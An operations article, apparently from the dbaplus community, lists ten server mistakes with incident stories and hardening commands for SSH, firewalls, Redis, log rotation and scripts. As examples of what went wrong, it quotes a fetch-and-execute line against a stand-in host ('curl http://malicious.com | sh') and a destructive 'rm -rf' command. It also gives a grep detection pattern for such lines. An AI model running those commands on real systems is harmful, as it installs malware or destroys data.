10 Server Mistakes That Can End Your Career – Real Disaster Cases & Prevention
This article compiles ten real-world server‑operation disasters, explains the technical fallout of each forbidden action, and provides concrete command‑line remedies and best‑practice safeguards to help engineers avoid career‑ending mistakes.
1. Power‑off the server directly
Case: An operations engineer cut power, causing loss of millions of transaction records.
Technical impact:
File system corruption (requires fsck repair)
Unsaved memory data lost
RAID controller cache data lost
Correct procedure:
sync; sync; sync
shutdown -h now
2. Run tests directly in production
Real incident: A developer executed rm -rf ./tmp/* on a live system; the tmp directory was a symlink to the root, wiping critical files.
Consequences:
Complete service outage
Data recovery took 72 hours
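A guard in front of the delete could have stopped this. The following is a minimal sketch, not a drop-in tool: `safe_clean_dir` is a hypothetical helper name, and it assumes bash plus a `find` that supports `-mindepth`, `-xdev`, and `-delete` (GNU or BSD). It refuses to empty a path that is a symlink or that resolves to the filesystem root.

```shell
#!/usr/bin/env bash
# Hypothetical helper: empty a directory only if it is a real directory,
# not a symlink, and does not resolve to the filesystem root.
safe_clean_dir() {
    local dir=$1
    # Strip trailing slashes: "tmp/" would otherwise hide the symlink from -L
    while [ "${dir%/}" != "$dir" ]; do dir=${dir%/}; done
    if [ -z "$dir" ] || [ ! -d "$dir" ]; then
        echo "refusing: '$1' is empty, the root, or not a directory" >&2
        return 1
    fi
    if [ -L "$dir" ]; then
        echo "refusing: '$dir' is a symlink to $(readlink "$dir")" >&2
        return 1
    fi
    local resolved
    resolved=$(cd "$dir" && pwd -P) || return 1
    if [ "$resolved" = "/" ]; then
        echo "refusing: '$dir' resolves to /" >&2
        return 1
    fi
    # -mindepth 1 keeps the directory itself; -xdev stays on one filesystem
    find "$resolved" -mindepth 1 -xdev -delete
}
```

With this in place, `safe_clean_dir ./tmp` would have printed a refusal instead of following the symlink. It only checks the top-level path, so it is a seat belt, not a substitute for testing outside production.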
3. Arbitrarily modify firewall rules
Disaster: An operator disabled iptables to save time, allowing ransomware to infiltrate the server.
Security rule: Never use iptables -F to flush all rules; always back up before changes.
iptables-save > /backup/iptables_$(date +%F).rules
4. Execute unknown scripts as root
Compromise: A third‑party “optimization” script actually ran curl http://malicious.com | sh, installing a cryptominer.
Protection:
Audit script content, especially any wget / curl download actions
Run scripts with a non‑privileged user
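For the audit step, a first pass can be automated. The sketch below assumes the script has already been saved to a local file rather than piped into a shell; `flag_remote_exec` is a hypothetical helper name. It prints every line that downloads something with `curl` or `wget` and pipes it straight into a shell. An empty result does not prove the script is safe, so it supplements reading the script and does not replace it.

```shell
#!/usr/bin/env bash
# Hypothetical helper: print (with line numbers) the lines of a script that
# fetch remote content and pipe it directly into a shell interpreter.
# Exit status follows grep: 0 if something was flagged, 1 if nothing matched.
flag_remote_exec() {
    local script=$1
    grep -nE '(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(ba|z|da)?sh([[:space:];]|$)' "$script"
}
```

Any flagged line deserves a manual look at what the remote URL actually serves before the script is allowed to run at all.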
sudo -u appuser ./deploy.sh
5. Operate the database without backups
Classic tragedy: A DBA ran ALTER TABLE without a backup, corrupting the table structure.
Safer workflow (copy the table before running the ALTER):
CREATE TABLE backup_table LIKE original_table;
INSERT INTO backup_table SELECT * FROM original_table;
6. Allow password‑based SSH login
Attack: Weak passwords were brute‑forced, granting attackers root access and enabling crypto‑mining.
Hardening steps:
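# Install the public key first, while password login still works
ssh-copy-id -i ~/.ssh/id_rsa.pub user@server
# Then disable password login (also rewrites a commented-out default line)
sed -i -E 's/^#?PasswordAuthentication.*/PasswordAuthentication no/' /etc/ssh/sshd_config
# Validate the config and reload the daemon (named sshd on RHEL-family systems)
sshd -t && systemctl reload sshd
7. Let log files grow unchecked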
Disk disaster: /var/log filled up, causing a Kafka cluster to crash.
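A filling disk can usually be caught before it takes a service down. The sketch below is one way to do that check from cron or a deploy script; `disk_usage_pct` and `check_disk` are hypothetical names, and the default limit of 80% is an assumed value, not one taken from the incident.

```shell
#!/usr/bin/env bash
# Hypothetical helper: print the usage percentage (an integer) of the
# filesystem that holds the given path.
disk_usage_pct() {
    # -P forces the one-line-per-filesystem POSIX format; field 5 is "NN%"
    df -P "$1" | awk 'NR == 2 { sub(/%/, "", $5); print $5 }'
}

# Return 1 with a warning when usage exceeds the limit, 2 when usage
# cannot be read, 0 otherwise. The default limit (80) is an assumption.
check_disk() {
    local path=$1 limit=${2:-80} used
    used=$(disk_usage_pct "$path")
    if [ -z "$used" ]; then
        echo "cannot read disk usage for $path" >&2
        return 2
    fi
    if [ "$used" -gt "$limit" ]; then
        echo "WARNING: $path is ${used}% full (limit ${limit}%)" >&2
        return 1
    fi
}
```

For example, `check_disk /var/log 80 || echo "rotate or clean logs now"` would give an early signal well before the partition is full.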
Remediation:
# Configure daily log rotation
vim /etc/logrotate.d/nginx
/var/log/nginx/*.log {
daily
rotate 30
compress
missingok
notifempty
}
8. Expose services on default ports
Ingress vector: Redis on port 6379 was publicly reachable and was mass‑attacked, wiping data.
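Exposure of this kind is easy to check for. The sketch below assumes the Linux `ss` tool and its usual `ss -ltn` column layout (local address in the fourth column); `wildcard_listeners` is a hypothetical helper name. It prints every TCP listener bound to all interfaces, which is the set worth reviewing against the firewall.

```shell
#!/usr/bin/env bash
# Hypothetical helper: read `ss -ltn` output on stdin and print the local
# address of every TCP listener bound to all interfaces
# (0.0.0.0, [::], or the "*" shorthand some ss versions print).
wildcard_listeners() {
    awk '$1 == "LISTEN" && $4 ~ /^(0\.0\.0\.0|\[::\]|\*):[0-9]+$/ { print $4 }'
}
```

Typical use would be `ss -ltn | wildcard_listeners`. A listener bound to a specific internal address, such as 10.0.0.1, does not appear in the output.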
Protection:
# Change default port
vim /etc/redis.conf
port 6380
# Bind to internal IP only
bind 10.0.0.1
9. Deploy changes without monitoring
Canary‑release disaster: An unmonitored midnight upgrade triggered a cascading service failure that went unnoticed.
Golden rule: Continuously monitor key metrics during changes.
# Real‑time change monitoring
watch -n 1 "netstat -ant | grep ESTABLISHED | wc -l"
# Baseline thresholds
- CPU usage spike >50%
- Memory consumption continuously rising
- Disk I/O latency >100ms
10. Fail to apply security updates
Vulnerability explosion: An unpatched Log4j flaw was exploited, encrypting all data.
Update policy:
# Secure update process
yum update --security -y
# Reboot after kernel upgrade
reboot
Overall, about 80% of operations incidents stem from human error; treating every command as a potential bomb‑defusal step can dramatically reduce downtime and data loss.
dbaplus Community
